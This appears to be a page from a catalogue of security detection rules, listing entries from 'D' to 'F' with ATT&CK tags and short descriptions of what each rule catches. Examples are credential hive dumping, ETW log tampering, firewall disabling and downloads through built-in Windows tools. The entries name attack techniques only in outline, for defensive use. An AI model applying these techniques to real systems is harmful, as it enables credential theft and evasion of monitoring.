Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.

Read More
Driver Load From A Temporary Directory

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1543.003 ·
Share on:

Detects a driver load from a temporary directory

Read More
Driver/DLL Installation Via Odbcconf.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1218.008 ·
Share on:

Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.

Read More
DriverQuery.EXE Execution

Aug 12, 2024 · attack.discovery ·
Share on:

Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers

Read More
Drop Binaries Into Spool Drivers Color Folder

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color" as seen in the blog referenced below

Read More
Droppers Exploiting CVE-2017-11882

Aug 12, 2024 · attack.execution attack.t1203 attack.t1204.002 attack.initial-access attack.t1566.001 cve.2017-11882 detection.emerging-threats ·
Share on:

Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe

Read More
Dropping Of Password Filter DLL

Aug 12, 2024 · attack.credential-access attack.t1556.002 ·
Share on:

Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS

Read More
DSInternals Suspicious PowerShell Cmdlets

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.

Read More
DSInternals Suspicious PowerShell Cmdlets - ScriptBlock

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.

Read More
Dump Credentials from Windows Credential Manager With PowerShell

Aug 12, 2024 · attack.credential-access attack.t1555 ·
Share on:

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

Read More
Dump Ntds.dit To Suspicious Location

Aug 12, 2024 · attack.execution ·
Share on:

Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location

Read More
Dumping of Sensitive Hives Via Reg.EXE

Aug 12, 2024 · attack.credential-access attack.t1003.002 attack.t1003.004 attack.t1003.005 car.2013-07-001 ·
Share on:

Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.

Read More
Dumping Process via Sqldumper.exe

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects process dump via legitimate sqldumper.exe binary

Read More
DumpMinitool Execution

Aug 12, 2024 · attack.defense-evasion attack.t1036 attack.t1003.001 ·
Share on:

Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"

Read More
DumpStack.log Defender Evasion

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects the use of the filename DumpStack.log to evade Microsoft Defender

Read More
Dynamic .NET Compilation Via Csc.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1027.004 ·
Share on:

Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.

Read More
Dynamic CSharp Compile Artefact

Aug 12, 2024 · attack.defense-evasion attack.t1027.004 ·
Share on:

When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution

Read More
Elise Backdoor Activity

Aug 12, 2024 · attack.g0030 attack.g0050 attack.s0081 attack.execution attack.t1059.003 detection.emerging-threats ·
Share on:

Detects Elise backdoor activity used by APT32

Read More
Email Exifiltration Via Powershell

Aug 12, 2024 · attack.exfiltration ·
Share on:

Detects email exfiltration via powershell cmdlets

Read More
Enable BPF Kprobes Tracing

Aug 12, 2024 · attack.execution attack.defense-evasion ·
Share on:

Detects common command used to enable bpf kprobes tracing

Read More
Enable LM Hash Storage - ProcCreation

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.

Read More
Enable Local Manifest Installation With Winget

Aug 12, 2024 · attack.defense-evasion attack.persistence ·
Share on:

Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.

Read More
Enable Microsoft Dynamic Data Exchange

Aug 12, 2024 · attack.execution attack.t1559.002 ·
Share on:

Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.

Read More
Enable Windows Remote Management

Aug 12, 2024 · attack.lateral-movement attack.t1021.006 ·
Share on:

Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

Read More
Enabled User Right in AD to Control User Objects

Aug 12, 2024 · attack.persistence attack.t1098 ·
Share on:

Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.

Read More
Enabling COR Profiler Environment Variables

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.012 ·
Share on:

Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.

Read More
End User Consent

Aug 12, 2024 · attack.credential-access attack.t1528 ·
Share on:

Detects when an end user consents to an application

Read More
End User Consent Blocked

Aug 12, 2024 · attack.credential-access attack.t1528 ·
Share on:

Detects when end user consent is blocked due to risk-based consent.

Read More
Enumerate Credentials from Windows Credential Manager With PowerShell

Aug 12, 2024 · attack.credential-access attack.t1555 ·
Share on:

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

Read More
Enumeration for 3rd Party Creds From CLI

Aug 12, 2024 · attack.credential-access attack.t1552.002 ·
Share on:

Detects processes that query known 3rd party registry keys that holds credentials via commandline

Read More
Enumeration for Credentials in Registry

Aug 12, 2024 · attack.credential-access attack.t1552.002 ·
Share on:

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services

Read More
Equation Group C2 Communication

Aug 12, 2024 · attack.command-and-control attack.g0020 attack.t1041 detection.emerging-threats ·
Share on:

Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools

Read More
Equation Group DLL_U Export Function Load

Aug 12, 2024 · attack.g0020 attack.defense-evasion attack.t1218.011 detection.emerging-threats ·
Share on:

Detects a specific export function name used by one of EquationGroup tools

Read More
Equation Group Indicators

Aug 12, 2024 · attack.execution attack.g0020 attack.t1059.004 ·
Share on:

Detects suspicious shell commands used in various Equation Group scripts and tools

Read More
Esentutl Gather Credentials

Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1003.003 ·
Share on:

Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.

Read More
Esentutl Steals Browser Information

Aug 12, 2024 · attack.collection attack.t1005 ·
Share on:

One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe

Read More
Esentutl Volume Shadow Copy Service Keys

Aug 12, 2024 · attack.credential-access attack.t1003.002 ·
Share on:

Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.

Read More
ETW Logging Disabled For rpcrt4.dll

Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562 ·
Share on:

Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll

Read More
ETW Logging Disabled For SCM

Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562 ·
Share on:

Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)

Read More
ETW Logging Disabled In .NET Processes - Registry

Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562 ·
Share on:

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

Read More
ETW Logging Disabled In .NET Processes - Sysmon Registry

Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562 ·
Share on:

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

Read More
ETW Logging Tamper In .NET Processes Via CommandLine

Aug 12, 2024 · attack.defense-evasion attack.t1562 ·
Share on:

Detects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.

Read More
ETW Trace Evasion Activity

Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1562.006 car.2016-04-002 ·
Share on:

Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.

Read More
EventLog EVTX File Deleted

Aug 12, 2024 · attack.defense-evasion attack.t1070 ·
Share on:

Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence

Read More
EvilNum APT Golden Chickens Deployment Via OCX Files

Aug 12, 2024 · attack.defense-evasion attack.t1218.011 detection.emerging-threats ·
Share on:

Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report

Read More
Exchange Exploitation CVE-2021-28480

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-28480 detection.emerging-threats ·
Share on:

Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480

Read More
Exchange Exploitation Used by HAFNIUM

Aug 12, 2024 · attack.initial-access attack.t1190 attack.g0125 detection.emerging-threats ·
Share on:

Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity

Read More
Exchange PowerShell Cmdlet History Deleted

Aug 12, 2024 · attack.defense-evasion attack.t1070 ·
Share on:

Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence

Read More
Exchange PowerShell Snap-Ins Usage

Aug 12, 2024 · attack.execution attack.t1059.001 attack.collection attack.t1114 ·
Share on:

Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27

Read More
Exchange Set OabVirtualDirectory ExternalUrl Property

Aug 12, 2024 · attack.persistence attack.t1505.003 ·
Share on:

Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log

Read More
Executable from Webdav

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/

Read More
Execute Code with Pester.bat

Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1216 ·
Share on:

Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)

Read More
Execute Code with Pester.bat as Parent

Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1216 ·
Share on:

Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)

Read More
Execute Files with Msdeploy.exe

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects file execution using the msdeploy.exe lolbin

Read More
Execute From Alternate Data Streams

Aug 12, 2024 · attack.defense-evasion attack.t1564.004 ·
Share on:

Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection

Read More
Execute Invoke-command on Remote Host

Aug 12, 2024 · attack.lateral-movement attack.t1021.006 ·
Share on:

Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

Read More
Execute MSDT Via Answer File

Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.execution ·
Share on:

Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)

Read More
Execute Pcwrun.EXE To Leverage Follina

Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.execution ·
Share on:

Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability

Read More
Execution DLL of Choice Using WAB.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.

Read More
Execution Of Non-Existing File

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)

Read More
Execution of Powershell Script in Public Folder

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder

Read More
Execution Of Script Located In Potentially Suspicious Directory

Aug 12, 2024 · attack.execution ·
Share on:

Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.

Read More
Execution via stordiag.exe

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe

Read More
Execution via WorkFolders.exe

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects using WorkFolders.exe to execute an arbitrary control.exe

Read More
Exploit for CVE-2015-1641

Aug 12, 2024 · attack.defense-evasion attack.t1036.005 cve.2015-1641 detection.emerging-threats ·
Share on:

Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641

Read More
Exploit for CVE-2017-0261

Aug 12, 2024 · attack.execution attack.t1203 attack.t1204.002 attack.initial-access attack.t1566.001 cve.2017-0261 detection.emerging-threats ·
Share on:

Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262

Read More
Exploit for CVE-2017-8759

Aug 12, 2024 · attack.execution attack.t1203 attack.t1204.002 attack.initial-access attack.t1566.001 cve.2017-8759 detection.emerging-threats ·
Share on:

Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759

Read More
Exploitation of CVE-2021-26814 in Wazuh

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-21978 cve.2021-26814 detection.emerging-threats ·
Share on:

Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814

Read More
Exploited CVE-2020-10189 Zoho ManageEngine

Aug 12, 2024 · attack.initial-access attack.t1190 attack.execution attack.t1059.001 attack.t1059.003 attack.s0190 cve.2020-10189 detection.emerging-threats ·
Share on:

Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189

Read More
Exploiting SetupComplete.cmd CVE-2019-1378

Aug 12, 2024 · attack.privilege-escalation attack.t1068 attack.execution attack.t1059.003 attack.t1574 cve.2019-1378 detection.emerging-threats ·
Share on:

Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378

Read More
Explorer NOUACCHECK Flag

Aug 12, 2024 · attack.defense-evasion attack.t1548.002 ·
Share on:

Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks

Read More
Explorer Process Tree Break

Aug 12, 2024 · attack.defense-evasion attack.t1036 ·
Share on:

Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"

Read More
Exports Critical Registry Keys To a File

Aug 12, 2024 · attack.exfiltration attack.t1012 ·
Share on:

Detects the export of a crital Registry key to a file.

Read More
Exports Registry Key To a File

Aug 12, 2024 · attack.exfiltration attack.t1012 ·
Share on:

Detects the export of the target Registry key to a file.

Read More
Exports Registry Key To an Alternate Data Stream

Aug 12, 2024 · attack.defense-evasion attack.t1564.004 ·
Share on:

Exports the target Registry key and hides it in the specified alternate data stream.

Read More
External Disk Drive Or USB Storage Device Was Recognized By The System

Aug 12, 2024 · attack.t1091 attack.t1200 attack.lateral-movement attack.initial-access ·
Share on:

Detects external disk drives or plugged-in USB devices.

Read More
External Remote RDP Logon from Public IP

Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1133 attack.t1078 attack.t1110 ·
Share on:

Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.

Read More
External Remote SMB Logon from Public IP

Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1133 attack.t1078 attack.t1110 ·
Share on:

Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.

Read More
Extracting Information with PowerShell

Aug 12, 2024 · attack.credential-access attack.t1552.001 ·
Share on:

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

Read More
Failed Authentications From Countries You Do Not Operate Out Of

Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1078.004 attack.t1110 ·
Share on:

Detect failed authentications from countries you do not operate out of.

Read More
Failed DNS Zone Transfer

Aug 12, 2024 · attack.reconnaissance attack.t1590.002 ·
Share on:

Detects when a DNS zone transfer failed.

Read More
Failed Logon From Public IP

Aug 12, 2024 · attack.initial-access attack.persistence attack.t1078 attack.t1190 attack.t1133 ·
Share on:

Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.

Read More
Failed MSExchange Transport Agent Installation

Aug 12, 2024 · attack.persistence attack.t1505.002 ·
Share on:

Detects a failed installation of a Exchange Transport Agent

Read More
Fax Service DLL Search Order Hijack

Aug 12, 2024 · attack.persistence attack.defense-evasion attack.t1574.001 attack.t1574.002 ·
Share on:

The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.

Read More
File and Directory Discovery - MacOS

Aug 12, 2024 · attack.discovery attack.t1083 ·
Share on:

Detects usage of system utilities to discover files and directories

Read More
File And SubFolder Enumeration Via Dir Command

Aug 12, 2024 · attack.discovery attack.t1217 ·
Share on:

Detects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.

Read More
File Creation Date Changed to Another Year

Aug 12, 2024 · attack.t1070.006 attack.defense-evasion ·
Share on:

Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.

Read More
File Creation In Suspicious Directory By Msdt.EXE

Aug 12, 2024 · attack.persistence attack.t1547.001 cve.2022-30190 ·
Share on:

Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities

Read More
File Decoded From Base64/Hex Via Certutil.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1027 ·
Share on:

Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution

Read More
File Decryption Using Gpg4win

Aug 12, 2024 · attack.execution ·
Share on:

Detects usage of Gpg4win to decrypt files

Read More
File Deletion

Aug 12, 2024 · attack.defense-evasion attack.t1070.004 ·
Share on:

Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity

Read More
File Deletion Via Del

Aug 12, 2024 · attack.defense-evasion attack.t1070.004 ·
Share on:

Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

Read More
File Download And Execution Via IEExec.EXE

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects execution of the IEExec utility to download and execute files

Read More
File Download From Browser Process Via Inline URL

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.

Read More
File Download Using Notepad++ GUP Utility

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.

Read More
File Download Using ProtocolHandler.exe

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)

Read More
File Download Via Bitsadmin

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003 ·
Share on:

Detects usage of bitsadmin downloading a file

Read More
File Download Via Bitsadmin To A Suspicious Target Folder

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003 ·
Share on:

Detects usage of bitsadmin downloading a file to a suspicious target folder

Read More
File Download Via Bitsadmin To An Uncommon Target Folder

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003 ·
Share on:

Detects usage of bitsadmin downloading a file to uncommon target folder

Read More
File Download via CertOC.EXE

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects when a user downloads a file by using CertOC.exe

Read More
File Download Via InstallUtil.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE"

Read More
File Download Via Nscurl - MacOS

Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1105 ·
Share on:

Detects the execution of the nscurl utility in order to download files.

Read More
File Download Via Windows Defender MpCmpRun.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.command-and-control attack.t1105 ·
Share on:

Detects the use of Windows Defender MpCmdRun.EXE to download files

Read More
File Download with Headless Browser

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files

Read More
File Encoded To Base64 Via Certutil.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1027 ·
Share on:

Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration

Read More
File Encryption Using Gpg4win

Aug 12, 2024 · attack.execution ·
Share on:

Detects usage of Gpg4win to encrypt files

Read More
File Encryption/Decryption Via Gpg4win From Suspicious Locations

Aug 12, 2024 · attack.execution ·
Share on:

Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.

Read More
File or Folder Permissions Change

Aug 12, 2024 · attack.defense-evasion attack.t1222.002 ·
Share on:

Detects file and folder permission changes.

Read More
File Recovery From Backup Via Wbadmin.EXE

Aug 12, 2024 · attack.impact attack.t1490 ·
Share on:

Detects the recovery of files from backups via "wbadmin.exe". Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials.

Read More
File Time Attribute Change

Aug 12, 2024 · attack.defense-evasion attack.t1070.006 ·
Share on:

Detect file time attribute change to hide new or changes to existing files

Read More
File Time Attribute Change - Linux

Aug 12, 2024 · attack.defense-evasion attack.t1070.006 ·
Share on:

Detect file time attribute change to hide new or changes to existing files.

Read More
File Was Not Allowed To Run

Aug 12, 2024 · attack.execution attack.t1204.002 attack.t1059.001 attack.t1059.003 attack.t1059.005 attack.t1059.006 attack.t1059.007 ·
Share on:

Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.

Read More
File With Suspicious Extension Downloaded Via Bitsadmin

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003 ·
Share on:

Detects usage of bitsadmin downloading a file with a suspicious extension

Read More
File With Uncommon Extension Created By An Office Application

Aug 12, 2024 · attack.t1204.002 attack.execution ·
Share on:

Detects the creation of files with an executable or script extension by an Office application.

Read More
Files Added To An Archive Using Rar.EXE

Aug 12, 2024 · attack.collection attack.t1560.001 ·
Share on:

Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Read More
Files With System DLL Name In Unsuspected Locations

Aug 12, 2024 · attack.defense-evasion attack.t1036.005 ·
Share on:

Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production.

Read More
Files With System Process Name In Unsuspected Locations

Aug 12, 2024 · attack.defense-evasion attack.t1036.005 ·
Share on:

Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using this rule in production.

Read More
Filter Driver Unloaded Via Fltmc.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1562 attack.t1562.002 ·
Share on:

Detect filter driver unloading activity via fltmc.exe

Read More
Findstr GPP Passwords

Aug 12, 2024 · attack.credential-access attack.t1552.006 ·
Share on:

Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.

Read More
Findstr Launching .lnk File

Aug 12, 2024 · attack.defense-evasion attack.t1036 attack.t1202 attack.t1027.003 ·
Share on:

Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack

Read More
Finger.EXE Execution

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects execution of the "finger.exe" utility. Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.

Read More
Fireball Archer Install

Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1218.011 detection.emerging-threats ·
Share on:

Detects Archer malware invocation via rundll32

Read More
Firewall Disabled via Netsh.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 attack.s0108 ·
Share on:

Detects netsh commands that turns off the Windows firewall

Read More
Firewall Rule Deleted Via Netsh.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Detects the removal of a port or application rule in the Windows Firewall configuration using netsh

Read More
Firewall Rule Update Via Netsh.EXE

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule

Read More
First Time Seen Remote Named Pipe

Aug 12, 2024 · attack.lateral-movement attack.t1021.002 ·
Share on:

This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes

Read More
First Time Seen Remote Named Pipe - Zeek

Aug 12, 2024 · attack.lateral-movement attack.t1021.002 ·
Share on:

This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes

Read More
Flash Player Update from Suspicious Location

Aug 12, 2024 · attack.initial-access attack.t1189 attack.execution attack.t1204.002 attack.defense-evasion attack.t1036.005 ·
Share on:

Detects a flashplayer update from an unofficial location

Read More
FlowCloud Registry Markers

Aug 12, 2024 · attack.persistence attack.t1112 ·
Share on:

Detects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.

Read More
Flush Iptables Ufw Chain

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic

Read More
FoggyWeb Backdoor DLL Loading

Aug 12, 2024 · attack.resource-development attack.t1587 detection.emerging-threats ·
Share on:

Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll

Read More
Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Aug 12, 2024 · attack.collection attack.t1074.001 ·
Share on:

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Read More
Folder Removed From Exploit Guard ProtectedFolders List - Registry

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder

Read More
Forfiles Command Execution

Aug 12, 2024 · attack.execution attack.t1059 ·
Share on:

Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.

Read More
Formbook Process Creation

Aug 12, 2024 · attack.resource-development attack.t1587.001 detection.emerging-threats ·
Share on:

Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.

Read More
Fortinet CVE-2018-13379 Exploitation

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2018-13379 detection.emerging-threats ·
Share on:

Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs

Read More
Fortinet CVE-2021-22123 Exploitation

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-22123 detection.emerging-threats ·
Share on:

Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs

Read More
Fsutil Behavior Set SymlinkEvaluation

Aug 12, 2024 · attack.execution attack.t1059 ·
Share on:

A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt

Read More
Fsutil Drive Enumeration

Aug 12, 2024 · attack.discovery attack.t1120 ·
Share on:

Attackers may leverage fsutil to enumerated connected drives.

Read More
Fsutil Suspicious Invocation

